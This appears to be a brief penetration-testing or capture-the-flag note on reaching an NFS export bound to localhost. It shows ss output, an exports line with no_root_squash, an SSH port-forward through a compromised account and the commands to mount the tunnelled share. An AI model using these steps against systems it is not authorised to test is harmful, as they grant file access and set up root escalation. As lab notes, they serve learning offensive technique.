NFS hidden mount

linux, nfs, pivot
# ss output
tcp   LISTEN      0       64                 0.0.0.0:2049         0.0.0.0:*                                                                                     
tcp   ESTAB       0       0                127.0.0.1:42724      127.0.0.1:2049                                                                                  
tcp   ESTAB       0       0                127.0.0.1:2049       127.0.0.1:42724                                                                                 
tcp   LISTEN      0       64                    [::]:2049            [::]:*    

# /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
# from attacker machine
ssh -L 3049:127.0.0.1:2049 paradox@10.10.190.17
# from attacker machine
sudo mount -vv -t nfs -o port=3049 127.0.0.1:/ /mnt
# / instead of /home/james
sudo mount -vv -t nfs -o port=3049 127.0.0.1:/ /mnt